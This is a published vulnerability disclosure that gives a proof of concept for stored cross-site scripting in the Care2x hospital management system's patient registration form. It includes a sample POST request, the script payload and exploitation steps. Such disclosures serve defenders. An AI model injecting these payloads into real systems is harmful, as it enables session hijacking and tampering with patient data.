96 lines
No EOL
2.9 KiB
Text
96 lines
No EOL
2.9 KiB
Text
# Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS
|
|
# Date: 13.08.2021
|
|
# Exploit Author: securityforeveryone.com
|
|
# Author Mail: hello[AT]securityforeveryone.com
|
|
# Vendor Homepage: https://care2x.org
|
|
# Software Link: https://sourceforge.net/projects/care2002/
|
|
# Version: =< 2.7 Alpha
|
|
# Tested on: Linux/Windows
|
|
# Researchers : Security For Everyone Team - https://securityforeveryone.com
|
|
|
|
'''
|
|
|
|
DESCRIPTION
|
|
|
|
Stored Cross Site Scripting(XSS) vulnerability in Care2x Hospital Information Management 2.7 Alpha. The vulnerability has found POST requests in /modules/registration_admission/patient_register.php page with "name_middle", "addr_str", "station", "name_maiden", "name_2", "name_3" parameters.
|
|
|
|
|
|
Example: /modules/registration_admission/patient_register.php POST request
|
|
|
|
Content-Disposition: form-data; name="date_reg"
|
|
|
|
2021-07-29 12:15:59
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="title"
|
|
|
|
asd
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_last"
|
|
|
|
asd
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_first"
|
|
|
|
asd
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_2"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_3"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_middle"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_maiden"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="name_others"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="date_birth"
|
|
|
|
05/07/2021
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="sex"
|
|
|
|
m
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="addr_str"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="addr_str_nr"
|
|
|
|
XSS
|
|
-----------------------------29836624427276403321197241205
|
|
Content-Disposition: form-data; name="addr_zip"
|
|
|
|
XSS
|
|
---------------------
|
|
|
|
If an attacker exploit this vulnerability, takeover any account wants.
|
|
|
|
Payload Used:
|
|
|
|
"><script>alert(document.cookie)</script>
|
|
|
|
EXPLOITATION
|
|
|
|
1- Login to Care2x Panel
|
|
2- /modules/registration_admission/patient_register.php
|
|
3- Use the payload vulnerable parameters.
|
|
|
|
|
|
ABOUT SECURITY FOR EVERYONE TEAM
|
|
|
|
We are a team that has been working on cyber security in the industry for a long time.
|
|
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
|
|
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
|
|
|
|
''' |